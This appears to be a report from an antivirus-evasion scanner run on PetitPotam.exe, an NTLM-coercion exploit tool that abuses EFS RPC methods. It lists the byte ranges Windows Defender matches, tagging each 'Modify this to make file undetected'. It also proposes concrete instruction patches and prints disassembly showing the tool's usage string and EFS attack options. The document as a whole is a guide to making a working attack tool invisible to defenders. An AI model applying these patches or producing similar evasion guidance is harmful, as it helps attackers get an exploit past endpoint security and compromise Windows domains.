File D3363A09CA1AA83F.PetitPotam.exe

Name: D3363A09CA1AA83F.PetitPotam.exe
Size: 109,568 bytes
Type: EXE PE32
MD5: 453b923b556ae6fd03a59e37e3797011
Scanner Name: defender
Appraisal: Fragile (AND) based
Scan Debug: Duration: 196s / Chunks: 791 / Matches: 275
Scan date: 2023-07-21 13:34:27

Matches

# Iteration Offset Size Section Detail SectionType Conclusion
0 0 1449 85 .text CODE Dominant. Modify this to make file undetected
1 0 1704 119 .text CODE Dominant. Modify this to make file undetected
2 0 2775 391 .text CODE Dominant. Modify this to make file undetected
3 0 3200 51 .text CODE Dominant. Modify this to make file undetected
4 0 3370 17 .text CODE Dominant. Modify this to make file undetected
5 0 3727 34 .text CODE Dominant. Modify this to make file undetected
6 0 3778 17 .text CODE Dominant. Modify this to make file undetected
7 0 3812 85 .text CODE Dominant. Modify this to make file undetected
8 0 3914 68 .text CODE Dominant. Modify this to make file undetected
9 0 4118 51 .text CODE Dominant. Modify this to make file undetected
10 0 4186 136 .text CODE Dominant. Modify this to make file undetected
11 0 4339 204 .text CODE Dominant. Modify this to make file undetected
12 0 4815 17 .text CODE Dominant. Modify this to make file undetected
13 0 4883 34 .text CODE Dominant. Modify this to make file undetected
14 0 5002 17 .text CODE Dominant. Modify this to make file undetected
15 0 5036 17 .text CODE Dominant. Modify this to make file undetected
16 0 5104 187 .text CODE Dominant. Modify this to make file undetected
17 0 5308 17 .text CODE Dominant. Modify this to make file undetected
18 0 5376 136 .text CODE Dominant. Modify this to make file undetected
19 0 5614 68 .text CODE Dominant. Modify this to make file undetected
20 0 6056 68 .text CODE Dominant. Modify this to make file undetected
21 0 6396 306 .text CODE Dominant. Modify this to make file undetected
23 0 7348 170 .text CODE Dominant. Modify this to make file undetected
24 0 7586 68 .text CODE Dominant. Modify this to make file undetected
25 0 7688 204 .text CODE Dominant. Modify this to make file undetected
26 0 7960 306 .text CODE Dominant. Modify this to make file undetected
27 0 8674 102 .text CODE Dominant. Modify this to make file undetected
28 0 9218 272 .text CODE Dominant. Modify this to make file undetected
29 0 9524 238 .text CODE Dominant. Modify this to make file undetected
30 0 9830 170 .text CODE Dominant. Modify this to make file undetected
31 0 11156 544 .text CODE Dominant. Modify this to make file undetected
32 0 11768 136 .text CODE Dominant. Modify this to make file undetected
33 0 12108 272 .text CODE Dominant. Modify this to make file undetected
34 0 12720 136 .text CODE Dominant. Modify this to make file undetected
35 0 16324 136 .text CODE Dominant. Modify this to make file undetected
36 0 17072 204 .text CODE Dominant. Modify this to make file undetected
37 0 17616 680 .text CODE Dominant. Modify this to make file undetected
38 0 18432 544 .text CODE Dominant. Modify this to make file undetected
39 0 19248 272 .text CODE Dominant. Modify this to make file undetected
40 0 19996 68 .text CODE Dominant. Modify this to make file undetected
41 0 20132 136 .text CODE Dominant. Modify this to make file undetected
42 0 20336 748 .text CODE Dominant. Modify this to make file undetected
43 0 21220 612 .text CODE Dominant. Modify this to make file undetected
44 0 24144 136 .text CODE Dominant. Modify this to make file undetected
45 0 24416 1360 .text CODE Dominant. Modify this to make file undetected
46 0 26592 136 .text CODE Dominant. Modify this to make file undetected
47 0 26864 408 .text CODE Dominant. Modify this to make file undetected
48 0 27680 408 .text CODE Dominant. Modify this to make file undetected
49 0 28360 272 .text CODE Dominant. Modify this to make file undetected
50 0 28768 272 .text CODE Dominant. Modify this to make file undetected
51 0 29176 816 .text CODE Dominant. Modify this to make file undetected
52 0 32848 952 .text CODE Dominant. Modify this to make file undetected
53 0 35160 680 .text CODE Dominant. Modify this to make file undetected
54 0 35976 952 .text CODE Dominant. Modify this to make file undetected
55 0 37064 680 .text CODE Dominant. Modify this to make file undetected
56 0 38560 1088 .text CODE Dominant. Modify this to make file undetected
57 0 40192 816 .text CODE Dominant. Modify this to make file undetected
58 0 41280 544 .text CODE Dominant. Modify this to make file undetected
59 0 42096 272 .text CODE Dominant. Modify this to make file undetected
60 0 42912 1088 .text CODE Dominant. Modify this to make file undetected
61 0 54880 1360 .text CODE Dominant. Modify this to make file undetected
62 0 57328 1088 .text CODE Dominant. Modify this to make file undetected
63 0 62224 816 .text CODE Dominant. Modify this to make file undetected
64 0 69568 272 .text CODE Dominant. Modify this to make file undetected
67 1 70941 16 .rdata IMAGE_DIRECTORY_ENTRY_IAT DATA Dominant. Modify this to make file undetected
68 1 70972 4 .rdata DATA Dominant. Modify this to make file undetected
69 1 75048 3 .rdata DATA Dominant. Modify this to make file undetected
70 1 75070 8 .rdata DATA Dominant. Modify this to make file undetected
71 1 75085 16 .rdata DATA Dominant. Modify this to make file undetected
72 1 97480 16 .rdata DATA Dominant. Modify this to make file undetected
73 1 97526 31 .rdata DATA Dominant. Modify this to make file undetected
74 1 97602 8 .rdata DATA Dominant. Modify this to make file undetected
75 1 97648 31 .rdata DATA Dominant. Modify this to make file undetected
76 1 100111 8 .rdata IMAGE_DIRECTORY_ENTRY_IMPORT DATA Dominant. Modify this to make file undetected
77 1 100126 15 .rdata IMAGE_DIRECTORY_ENTRY_IMPORT DATA Dominant. Modify this to make file undetected
78 1 100156 244 .rdata IMAGE_DIRECTORY_ENTRY_IMPORT DATA Dominant. Modify this to make file undetected
79 1 100583 31 .rdata DATA Dominant. Modify this to make file undetected
80 1 100652 153 .rdata DATA Dominant. Modify this to make file undetected
81 1 100820 46 .rdata DATA Dominant. Modify this to make file undetected
82 1 100881 92 .rdata DATA Dominant. Modify this to make file undetected
83 1 101034 167 .rdata DATA Dominant. Modify this to make file undetected
84 1 101232 61 .rdata DATA Dominant. Modify this to make file undetected
85 1 101323 16 .rdata DATA Dominant. Modify this to make file undetected
86 1 101384 31 .rdata DATA Dominant. Modify this to make file undetected
87 1 101430 31 .rdata DATA Dominant. Modify this to make file undetected
88 1 101476 61 .rdata DATA Dominant. Modify this to make file undetected
89 1 101567 46 .rdata DATA Dominant. Modify this to make file undetected
90 2 102018 5 .data DATA Dominant. Modify this to make file undetected
91 2 102173 5 .data DATA Dominant. Modify this to make file undetected
92 2 102383 5 .data DATA Dominant. Modify this to make file undetected

Patches

Match ID Offset Info Patch Considereations
0 1449 Replace with 'mov eax, eax'
0x5a9: int3
0x5aa: int3
.
0 1451 Replace with 'mov eax, eax'
0x5ab: int3
0x5ac: int3
.
0 1453 Replace with 'mov eax, eax'
0x5ad: int3
0x5ae: int3
.
0 1462 Replace with 'mov eax, eax'
0x5b6: int3
0x5b7: int3
.
0 1464 Replace with 'mov eax, eax'
0x5b8: int3
0x5b9: int3
.
0 1466 Replace with 'mov eax, eax'
0x5ba: int3
0x5bb: int3
.
0 1468 Replace with 'mov eax, eax'
0x5bc: int3
0x5bd: int3
.
0 1470 Replace with 'mov eax, eax'
0x5be: int3
0x5bf: int3
.
0 1524 Replace with 'mov eax, eax'
0x5f4: int3
0x5f5: int3
.
0 1526 Replace with 'mov eax, eax'
0x5f6: int3
0x5f7: int3
.
0 1528 Replace with 'mov eax, eax'
0x5f8: int3
0x5f9: int3
.
0 1530 Replace with 'mov eax, eax'
0x5fa: int3
0x5fb: int3
.
0 1532 Replace with 'mov eax, eax'
0x5fc: int3
0x5fd: int3
.
2 3030 Swap
0xbd6: mov byte [var_24h], al
0xbd9: mov eax, dword [0x41abdc]
2 3080 Swap
0xc08: mov dword [var_4h], 0xfffffffe
0xc0f: mov eax, 0xff
2 3145 Swap
0xc49: mov esi, eax
0xc4b: xor edi, edi
7 3850 Swap
0xf0a: mov ebp, esp
0xf0c: cmp byte [0x41abe5], 0
8 3958 Swap
0xf76: mov dword [0x41abfc], ecx
0xf7c: mov byte [0x41abe5], 1
9 4150 Swap
0x1036: xor eax, eax
0x1038: mov ecx, 0x41abe0
10 4202 Swap
0x106a: mov ebp, esp
0x106c: cmp dword [0x41abe8], 0xffffffff
11 4352 Swap
0x1100: mov edi, 0xbb40e64e
0x1105: mov esi, 0xffff0000
14 5005 Swap
0x138d: mov esi, 0x418ef8
0x1392: mov ebx, 0x418ef8
16 5174 Swap
0x1436: mov ebp, esp
0x1438: and dword [0x41ac18], 0
16 5209 Swap
0x1459: and dword [var_10h], 0
0x145d: xor eax, eax
16 5218 Swap
0x1462: xor ecx, ecx
0x1464: lea edi, [var_24h]
16 5237 Swap
0x1475: xor ecx, ecx
0x1477: mov dword [edi + 0xc], edx
16 5248 Swap
0x1480: mov dword [var_ch], eax
0x1483: xor edi, 0x6c65746e
18 5379 Swap
0x1503: mov edi, dword [0x41ac1c]
0x1509: mov ecx, dword [var_1ch]
18 5418 Swap
0x152a: mov ecx, dword [var_4h]
0x152d: mov dword [ebx + 0xc], edx
18 5446 Swap
0x1546: mov ebx, dword [var_10h]
0x1549: mov eax, dword [0x41a010]

Match 0: 1449 (size: 85)

Dominant. Modify this to make file undetected

.text

000005A9   CC CC CC CC CC CC CC B8 E0 B3 41 00 C3 CC CC CC    ..........A.....
000005B9   CC CC CC CC CC CC CC 55 8B EC 83 E4 F8 51 56 8B    .......U.....QV.
000005C9   75 08 6A 01 E8 36 20 00 00 83 C4 04 8D 4D 0C 51    u.j..6 ......M.Q
000005D9   6A 00 56 50 E8 CE FF FF FF FF 70 04 FF 30 E8 D4    j.VP......p..0..
000005E9   3C 00 00 83 C4 18 5E 8B E5 5D C3 CC CC CC CC CC    <.....^..]......
000005F9   CC CC CC CC CC                                     .....

0x59b: 0x0040119b 8b45fc mov eax, dword [var_4h]
0x59e: 0x0040119e 8be5 mov esp, ebp
0x5a0: 0x004011a0 5d pop ebp
0x5a1: 0x004011a1 c3 ret
0x5a2: 0x004011a2 cc int3
0x5a3: 0x004011a3 cc int3
0x5a4: 0x004011a4 cc int3
0x5a5: 0x004011a5 cc int3
0x5a6: 0x004011a6 cc int3
0x5a7: 0x004011a7 cc int3
0x5a8: 0x004011a8 cc int3
0x5a9: 0x004011a9 cc int3
0x5aa: 0x004011aa cc int3
0x5ab: 0x004011ab cc int3
0x5ac: 0x004011ac cc int3
0x5ad: 0x004011ad cc int3
0x5ae: 0x004011ae cc int3
0x5af: 0x004011af cc int3
0x5b0: ; CALL XREF from fcn.004011c0 @ 0x4011dd(x)
0x5b0: ; CALL XREF from fcn.00401200 @ 0x401216(x)
0x5b0: ; CALL XREF from fcn.00401d89 @ 0x401d89(x)
0x5b0: 6: fcn.004011b0 ();
0x5b0: 0x004011b0 b8e0b34100 mov eax, 0x41b3e0
0x5b5: 0x004011b5 c3 ret
0x5b6: 0x004011b6 cc int3
0x5b7: 0x004011b7 cc int3
0x5b8: 0x004011b8 cc int3
0x5b9: 0x004011b9 cc int3
0x5ba: 0x004011ba cc int3
0x5bb: 0x004011bb cc int3
0x5bc: 0x004011bc cc int3
0x5bd: 0x004011bd cc int3
0x5be: 0x004011be cc int3
0x5bf: 0x004011bf cc int3
0x5c0: ; XREFS: CALL 0x004012af CALL 0x004012bc CALL 0x004012c9
0x5c0: ; XREFS: CALL 0x004012d6 CALL 0x004012e3 CALL 0x004012f0
0x5c0: ; XREFS: CALL 0x004012fd CALL 0x0040130a CALL 0x00401317
0x5c0: ; XREFS: CALL 0x00401324 CALL 0x0040138a CALL 0x004013b4
0x5c0: ; XREFS: CALL 0x00401693 CALL 0x004016b7
0x5c0: 52: fcn.004011c0 (int32_t arg_8h, int32_t arg_ch);
0x5c0: ; arg int32_t arg_8h @ ebp+0x8
0x5c0: ; arg int32_t arg_ch @ ebp+0xc
0x5c0: 0x004011c0 55 push ebp
0x5c1: 0x004011c1 8bec mov ebp, esp
0x5c3: 0x004011c3 83e4f8 and esp, 0xfffffff8
0x5c6: 0x004011c6 51 push ecx
0x5c7: 0x004011c7 56 push esi
0x5c8: 0x004011c8 8b7508 mov esi, dword [arg_8h]
0x5cb: 0x004011cb 6a01 push 1 ; 1 ; signed int arg_8h
0x5cd: 0x004011cd e836200000 call fcn.00403208
0x5d2: 0x004011d2 83c404 add esp, 4
0x5d5: 0x004011d5 8d4d0c lea ecx, [arg_ch]
0x5d8: 0x004011d8 51 push ecx
0x5d9: 0x004011d9 6a00 push 0
0x5db: 0x004011db 56 push esi
0x5dc: 0x004011dc 50 push eax
0x5dd: 0x004011dd e8ceffffff call fcn.004011b0
0x5e2: 0x004011e2 ff7004 push dword [eax + 4] ; int32_t arg_ch
0x5e5: 0x004011e5 ff30 push dword [eax] ; int32_t arg_8h
0x5e7: 0x004011e7 e8d43c0000 call fcn.00404ec0
0x5ec: 0x004011ec 83c418 add esp, 0x18
0x5ef: 0x004011ef 5e pop esi
0x5f0: 0x004011f0 8be5 mov esp, ebp
0x5f2: 0x004011f2 5d pop ebp
0x5f3: 0x004011f3 c3 ret
0x5f4: 0x004011f4 cc int3
0x5f5: 0x004011f5 cc int3
0x5f6: 0x004011f6 cc int3
0x5f7: 0x004011f7 cc int3
0x5f8: 0x004011f8 cc int3
0x5f9: 0x004011f9 cc int3
0x5fa: 0x004011fa cc int3
0x5fb: 0x004011fb cc int3
0x5fc: 0x004011fc cc int3
0x5fd: 0x004011fd cc int3
0x5fe: 0x004011fe cc int3
0x5ff: 0x004011ff cc int3
0x600: ; CALL XREFS from main @ 0x401355(x), 0x40140a(x)
0x600: 52: fcn.00401200 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h);
0x600: ; arg int32_t arg_8h @ ebp+0x8
0x600: ; arg int32_t arg_ch @ ebp+0xc
0x600: ; arg int32_t arg_10h @ ebp+0x10
0x600: ; arg int32_t arg_14h @ ebp+0x14
0x600: 0x00401200 55 push ebp
0x601: 0x00401201 8bec mov ebp, esp
0x603: 0x00401203 83e4f8 and esp, 0xfffffff8
0x606: 0x00401206 8b4508 mov eax, dword [arg_8h]
0x609: 0x00401209 8d4d14 lea ecx, [arg_14h]
0x60c: 0x0040120c 51 push ecx
0x60d: 0x0040120d 6a invalid

Match 1: 1704 (size: 119)

Dominant. Modify this to make file undetected

.text

000006A8   00 00 68 40 87 41 00 E8 0C FF FF FF 83 C4 04 68    ..h@.A.........h
000006B8   D8 87 41 00 E8 FF FE FF FF 83 C4 04 68 DC 87 41    ..A.........h..A
000006C8   00 E8 F2 FE FF FF 83 C4 04 68 08 88 41 00 E8 E5    .........h..A...
000006D8   FE FF FF 83 C4 04 68 6C 88 41 00 E8 D8 FE FF FF    ......hl.A......
000006E8   83 C4 04 68 A0 88 41 00 E8 CB FE FF FF 83 C4 04    ...h..A.........
000006F8   68 D4 88 41 00 E8 BE FE FF FF 83 C4 04 68 0C 89    h..A.........h..
00000708   41 00 E8 B1 FE FF FF 83 C4 04 68 48 89 41 00 E8    A.........hH.A..
00000718   A4 FE FF FF 83 C4 04                               .......

0x69a: 0x0040129a 837d0804 cmp dword [argv], 4
0x69e: 0x0040129e 53 push ebx
0x69f: 0x0040129f 8b5d0c mov ebx, dword [envp]
0x6a2: 0x004012a2 56 push esi
0x6a3: 0x004012a3 57 push edi
0x6a4: < 0x004012a4 0f8499000000 je 0x401343
0x6aa: 0x004012aa 6840874100 push str.Usage:_PetitPotam.exe__captureServerIP___targetServerIP___EFS_API_to_use__n ; 0x418740 ; u"Usage: PetitPotam.exe <captureServerIP> <targetServerIP> <EFS-API-to-use>\n" ; int32_t arg_8h
0x6af: 0x004012af e80cffffff call fcn.004011c0
0x6b4: 0x004012b4 83c404 add esp, 4
0x6b7: 0x004012b7 68d8874100 push 0x4187d8 ; int32_t arg_8h
0x6bc: 0x004012bc e8fffeffff call fcn.004011c0
0x6c1: 0x004012c1 83c404 add esp, 4
0x6c4: 0x004012c4 68dc874100 push 0x4187dc ; int32_t arg_8h
0x6c9: 0x004012c9 e8f2feffff call fcn.004011c0
0x6ce: 0x004012ce 83c404 add esp, 4
0x6d1: 0x004012d1 6808884100 push str.1:_EfsRpcOpenFileRaw__fixed_with_CVE_2021_36942__n ; 0x418808 ; u"1: EfsRpcOpenFileRaw (fixed with CVE-2021-36942)\n" ; int32_t arg_8h
0x6d6: 0x004012d6 e8e5feffff call fcn.004011c0
0x6db: 0x004012db 83c404 add esp, 4
0x6de: 0x004012de 686c884100 push str.2:_EfsRpcEncryptFileSrv_n ; 0x41886c ; u"2: EfsRpcEncryptFileSrv\n" ; int32_t arg_8h
0x6e3: 0x004012e3 e8d8feffff call fcn.004011c0
0x6e8: 0x004012e8 83c404 add esp, 4
0x6eb: 0x004012eb 68a0884100 push str.3:_EfsRpcDecryptFileSrv_n ; 0x4188a0 ; u"3: EfsRpcDecryptFileSrv\n" ; int32_t arg_8h
0x6f0: 0x004012f0 e8cbfeffff call fcn.004011c0
0x6f5: 0x004012f5 83c404 add esp, 4
0x6f8: 0x004012f8 68d4884100 push str.4:_EfsRpcQueryUsersOnFile_n ; 0x4188d4 ; u"4: EfsRpcQueryUsersOnFile\n" ; int32_t arg_8h
0x6fd: 0x004012fd e8befeffff call fcn.004011c0
0x702: 0x00401302 83c404 add esp, 4
0x705: 0x00401305 680c894100 push str.5:_EfsRpcQueryRecoveryAgents_n ; 0x41890c ; u"5: EfsRpcQueryRecoveryAgents\n" ; int32_t arg_8h
0x70a: 0x0040130a e8b1feffff call fcn.004011c0
0x70f: 0x0040130f 83c404 add esp, 4
0x712: 0x00401312 6848894100 push str.6:_EfsRpcRemoveUsersFromFile_n ; 0x418948 ; u"6: EfsRpcRemoveUsersFromFile\n" ; int32_t arg_8h
0x717: 0x00401317 e8a4feffff call fcn.004011c0
0x71c: 0x0040131c 83c404 add esp, 4
0x71f: 0x0040131f 6884894100 push str.6:_EfsRpcAddUsersToFile_n ; 0x418984 ; u"6: EfsRpcAddUsersToFile\n" ; int32_t arg_8h
0x724: 0x00401324 e897feffff call fcn.004011c0
0x729: 0x00401329 83c404 add esp, 4
0x72c: 0x0040132c 33c0 xor eax, eax
0x72e: 0x0040132e 5f pop edi

Match 2: 2775 (size: 391)

Dominant. Modify this to make file undetected

.text

00000AD7   5D C3 3B 0D 04 A0 41 00 75 01 C3 E9 79 02 00 00    ].;...A.u...y...
00000AE7   56 6A 01 E8 FC 39 00 00 E8 56 06 00 00 50 E8 B6    Vj...9...V...P..
00000AF7   43 00 00 E8 44 06 00 00 8B F0 E8 44 45 00 00 6A    C...D......DE..j
00000B07   01 89 30 E8 FA 03 00 00 83 C4 0C 5E 84 C0 74 73    ..0........^..ts
00000B17   DB E2 E8 6D 08 00 00 68 B7 1F 40 00 E8 6E 05 00    ...m...h..@..n..
00000B27   00 E8 19 06 00 00 50 E8 66 3D 00 00 59 59 85 C0    ......P.f=..YY..
00000B37   75 51 E8 12 06 00 00 E8 63 06 00 00 85 C0 74 0B    uQ......c.....t.
00000B47   68 43 1D 40 00 E8 21 3A 00 00 59 E8 29 06 00 00    hC.@..!:..Y.)...
00000B57   E8 24 06 00 00 E8 FE 05 00 00 E8 DD 05 00 00 50    .$.............P
00000B67   E8 46 44 00 00 59 E8 EA 05 00 00 84 C0 74 05 E8    .FD..Y.......t..
00000B77   0B 40 00 00 E8 C3 05 00 00 E8 54 07 00 00 85 C0    .@........T.....
00000B87   75 01 C3 6A 07 E8 2D 06 00 00 CC E8 F2 05 00 00    u..j..-.........
00000B97   33 C0 C3 E8 82 07 00 00 E8 9F 05 00 00 50 E8 71    3............P.q
00000BA7   44 00 00 59 C3 6A 14 68 08 8F 41 00 E8 38 08 00    D..Y.j.h..A..8..
00000BB7   00 6A 01 E8 11 03 00 00 59 84 C0 0F 84 50 01 00    .j......Y....P..
00000BC7   00 32 DB 88 5D E7 83 65 FC 00 E8 C8 02 00 00 88    .2..]..e........
00000BD7   45 DC A1 DC AB 41 00 33 C9 41 3B C1 0F 84 2F 01    E....A.3.A;.../.
00000BE7   00 00 85 C0 75 49 89 0D DC AB 41 00 68 4C 21 41    ....uI....A.hL!A
00000BF7   00 68 30 21 41 00 E8 CE 3F 00 00 59 59 85 C0 74    .h0!A...?..YY..t
00000C07   11 C7 45 FC FE FF FF FF B8 FF 00 00 00 E9 EF 00    ..E.............
00000C17   00 00 68 2C 21 41 00 68 24 21 41 00 E8 63 3F 00    ..h,!A.h$!A..c?.
00000C27   00 59 59 C7 05 DC AB 41 00 02 00 00 00 EB 05 8A    .YY....A........
00000C37   D9 88 5D E7 FF 75 DC E8 E1 03 00 00 59 E8 69 05    ..]..u......Y.i.
00000C47   00 00 8B F0 33 FF 39 3E 74 1B 56 E8 39 03 00 00    ....3.9>t.V.9...
00000C57   59 84 C0 74 10 8B 36                               Y..t..6

0xacb: 0x004016cb 5f pop edi
0xacc: 0x004016cc 5e pop esi
0xacd: 0x004016cd 5b pop ebx
0xace: 0x004016ce 33cc xor ecx, esp
0xad0: 0x004016d0 e804000000 call fcn.004016d9
0xad5: 0x004016d5 8be5 mov esp, ebp
0xad7: 0x004016d7 5d pop ebp
0xad8: 0x004016d8 c3 ret
0xad9: ; XREFS(27)
0xad9: 264: fcn.004016d9 (int32_t arg_4h, int32_t arg_8h);
0xad9: ; arg int32_t arg_4h @ ebp+0x4
0xad9: ; arg int32_t arg_8h @ ebp+0x8
0xad9: ; var int32_t var_324h @ ebp-0x324
0xad9: 0x004016d9 3b0d04a04100 cmp ecx, dword [0x41a004] ; [0x41a004:4]=0xbb40e64e
0xadf: < 0x004016df 7501 jne 0x4016e2
0xae1: 0x004016e1 c3 ret
0xae2: ; CODE XREF from fcn.004016d9 @ 0x4016df(x)
0xae2: > 0x004016e2 e979020000 jmp 0x401960
0xae7: 0x004016e7 56 push esi
0xae8: 0x004016e8 6a01 push 1 ; 1
0xaea: 0x004016ea e8fc390000 call fcn.004050eb
0xaef: 0x004016ef e856060000 call fcn.00401d4a
0xaf4: 0x004016f4 50 push eax
0xaf5: 0x004016f5 e8b6430000 call fcn.00405ab0
0xafa: 0x004016fa e844060000 call fcn.00401d43
0xaff: 0x004016ff 8bf0 mov esi, eax
0xb01: 0x00401701 e844450000 call fcn.00405c4a
0xb06: 0x00401706 6a01 push 1 ; 1
0xb08: 0x00401708 8930 mov dword [eax], esi
0xb0a: 0x0040170a e8fa030000 call fcn.00401b09
0xb0f: 0x0040170f 83c40c add esp, 0xc
0xb12: 0x00401712 5e pop esi
0xb13: 0x00401713 84c0 test al, al
0xb15: < 0x00401715 7473 je 0x40178a
0xb17: 0x00401717 dbe2 fnclex
0xb19: 0x00401719 e86d080000 call fcn.00401f8b
0xb1e: 0x0040171e 68b71f4000 push 0x401fb7
0xb23: 0x00401723 e86e050000 call fcn.00401c96
0xb28: 0x00401728 e819060000 call fcn.00401d46
0xb2d: 0x0040172d 50 push eax
0xb2e: 0x0040172e e8663d0000 call fcn.00405499
0xb33: 0x00401733 59 pop ecx
0xb34: 0x00401734 59 pop ecx
0xb35: 0x00401735 85c0 test eax, eax
0xb37: < 0x00401737 7551 jne 0x40178a
0xb39: 0x00401739 e812060000 call fcn.00401d50
0xb3e: 0x0040173e e863060000 call fcn.00401da6
0xb43: 0x00401743 85c0 test eax, eax
0xb45: < 0x00401745 740b je 0x401752
0xb47: 0x00401747 68431d4000 push fcn.00401d43 ; 0x401d43 ; "3\xc0\xc33\xc0@\u00f8"
0xb4c: 0x0040174c e8213a0000 call fcn.00405172
0xb51: 0x00401751 59 pop ecx
0xb52: ; CODE XREF from fcn.004016d9 @ +0x6c(x)
0xb52: > 0x00401752 e829060000 call fcn.00401d80
0xb57: 0x00401757 e824060000 call fcn.00401d80
0xb5c: 0x0040175c e8fe050000 call fcn.00401d5f
0xb61: 0x00401761 e8dd050000 call fcn.00401d43
0xb66: 0x00401766 50 push eax
0xb67: 0x00401767 e846440000 call fcn.00405bb2
0xb6c: 0x0040176c 59 pop ecx
0xb6d: 0x0040176d e8ea050000 call fcn.00401d5c
0xb72: 0x00401772 84c0 test al, al
0xb74: < 0x00401774 7405 je 0x40177b
0xb76: 0x00401776 e80b400000 call fcn.00405786
0xb7b: ; CODE XREF from fcn.004016d9 @ +0x9b(x)
0xb7b: > 0x0040177b e8c3050000 call fcn.00401d43
0xb80: 0x00401780 e854070000 call fcn.00401ed9
0xb85: 0x00401785 85c0 test eax, eax
0xb87: < 0x00401787 7501 jne 0x40178a
0xb89: 0x00401789 c3 ret
0xb8a: ; CODE XREFS from fcn.004016d9 @ +0x3c(x), +0x5e(x), +0xae(x)
0xb8a: > 0x0040178a 6a07 push 7 ; 7
0xb8c: 0x0040178c e82d060000 call fcn.00401dbe
0xb91: 0x00401791 cc int3
0xb92: 0x00401792 e8f2050000 call fcn.00401d89
0xb97: 0x00401797 33c0 xor eax, eax
0xb99: 0x00401799 c3 ret
0xb9a: 0x0040179a e882070000 call fcn.00401f21
0xb9f: 0x0040179f e89f050000 call fcn.00401d43
0xba4: 0x004017a4 50 push eax
0xba5: 0x004017a5 e871440000 call fcn.00405c1b
0xbaa: 0x004017aa 59 pop ecx
0xbab: 0x004017ab c3 ret
0xbac: ; CODE XREF from entry0 @ 0x401933(x)
0xbac: 0x004017ac 6a14 push 0x14 ; 20
0xbae: 0x004017ae 68088f4100 push 0x418f08 ; int32_t arg_10h
0xbb3: 0x004017b3 e838080000 call fcn.00401ff0
0xbb8: 0x004017b8 6a01 push 1 ; 1 ; uint32_t arg_8h
0xbba: 0x004017ba e811030000 call fcn.00401ad0
0xbbf: 0x004017bf 59 pop ecx
0xbc0: 0x004017c0 84c0 test al, al
0xbc2: < 0x004017c2 0f8450010000 je 0x401918
0xbc8: 0x004017c8 32db xor bl, bl
0xbca: 0x004017ca 885de7 mov byte [var_19h], bl
0xbcd: 0x004017cd 8365fc00 and dword [var_4h], 0
0xbd1: 0x004017d1 e8c8020000 call fcn.00401a9e
0xbd6: 0x004017d6 8845dc mov byte [var_24h], al
0xbd9: 0x004017d9 a1dcab4100 mov eax, dword [0x41abdc] ; [0x41abdc:4]=0
0xbde: 0x004017de 33c9 xor ecx, ecx
0xbe0: 0x004017e0 41 inc ecx
0xbe1: 0x004017e1 3bc1 cmp eax, ecx
0xbe3: < 0x004017e3 0f842f010000 je 0x401918
0xbe9: 0x004017e9 85c0 test eax, eax
0xbeb: < 0x004017eb 7549 jne 0x401836
0xbed: 0x004017ed 890ddcab4100 mov dword [0x41abdc], ecx ; [0x41abdc:4]=0
0xbf3: 0x004017f3 684c214100 push 0x41214c ; 'L!A' ; uint32_t arg_ch
0xbf8: 0x004017f8 6830214100 push 0x412130 ; '0!A' ; int32_t arg_8h
0xbfd: 0x004017fd e8ce3f0000 call fcn.004057d0
0xc02: 0x00401802 59 pop ecx
0xc03: 0x00401803 59 pop ecx
0xc04: 0x00401804 85c0 test eax, eax
0xc06: < 0x00401806 7411 je 0x401819
0xc08: 0x00401808 c745fcfeffff. mov dword [var_4h], 0xfffffffe ; 4294967294
0xc0f: 0x0040180f b8ff000000 mov eax, 0xff ; 255
0xc14: < 0x00401814 e9ef000000 jmp 0x401908
0xc19: ; CODE XREF from entry0 @ 0x401806(x)
0xc19: > 0x00401819 682c214100 push 0x41212c ; ',!A' ; uint32_t arg_ch
0xc1e: 0x0040181e 6824214100 push 0x412124 ; '$!A' ; int32_t arg_8h
0xc23: 0x00401823 e8633f0000 call fcn.0040578b
0xc28: 0x00401828 59 pop ecx
0xc29: 0x00401829 59 pop ecx
0xc2a: 0x0040182a c705dcab4100. mov dword [0x41abdc], 2 ; [0x41abdc:4]=0
0xc34: < 0x00401834 eb05 jmp 0x40183b
0xc36: ; CODE XREF from entry0 @ 0x4017eb(x)
0xc36: > 0x00401836 8ad9 mov bl, cl
0xc38: 0x00401838 885de7 mov byte [var_19h], bl
0xc3b: ; CODE XREF from entry0 @ 0x401834(x)
0xc3b: > 0x0040183b ff75dc push dword [var_24h] ; uint32_t arg_8h
0xc3e: 0x0040183e e8e1030000 call fcn.00401c24
0xc43: 0x00401843 59 pop ecx
0xc44: 0x00401844 e869050000 call fcn.00401db2
0xc49: 0x00401849 8bf0 mov esi, eax
0xc4b: 0x0040184b 33ff xor edi, edi
0xc4d: 0x0040184d 393e cmp dword [esi], edi
0xc4f: < 0x0040184f 741b je 0x40186c
0xc51: 0x00401851 56 push esi ; int32_t arg_8h
0xc52: 0x00401852 e839030000 call fcn.00401b90
0xc57: 0x00401857 59 pop ecx
0xc58: 0x00401858 84c0 test al, al
0xc5a: < 0x0040185a 7410 je 0x40186c
0xc5c: 0x0040185c 8b36 mov esi, dword [esi]
0xc5e: 0x0040185e 57 push edi
0xc5f: 0x0040185f 6a02 push 2 ; 2
0xc61: 0x00401861 57 push edi
0xc62: 0x00401862 8bce mov ecx, esi
0xc64: 0x00401864 ff1520214100 call dword [0x412120]
0xc6a: 0x0040186a ffd6 call esi
0xc6c: ; CODE XREFS from entry0 @ 0x40184f(x), 0x40185a(x)
0xc6c: > 0x0040186c e8 invalid
0xc6d: 0x0040186d 47 inc edi

Match 3: 3200 (size: 51)

Dominant. Modify this to make file undetected

.text

00000C80   74 08 FF 36 E8 EB 41 00 00 59 E8 E3 3E 00 00 8B    t..6..A..Y..>...
00000C90   F8 E8 76 42 00 00 8B 30 E8 69 42 00 00 57 56 FF    ..vB...0.iB..WV.
00000CA0   30 E8 DA F9 FF FF 83 C4 0C 8B F0 E8 2E 06 00 00    0...............
00000CB0   84 C0 74                                           ..t

0xc71: 0x00401871 8bf0 mov esi, eax
0xc73: 0x00401873 393e cmp dword [esi], edi
0xc75: < 0x00401875 7413 je 0x40188a
0xc77: 0x00401877 56 push esi ; int32_t arg_8h
0xc78: 0x00401878 e813030000 call fcn.00401b90
0xc7d: 0x0040187d 59 pop ecx
0xc7e: 0x0040187e 84c0 test al, al
0xc80: < 0x00401880 7408 je 0x40188a
0xc82: 0x00401882 ff36 push dword [esi] ; int32_t arg_8h
0xc84: 0x00401884 e8eb410000 call fcn.00405a74
0xc89: 0x00401889 59 pop ecx
0xc8a: ; CODE XREFS from entry0 @ 0x401875(x), 0x401880(x)
0xc8a: > 0x0040188a e8e33e0000 call fcn.00405772
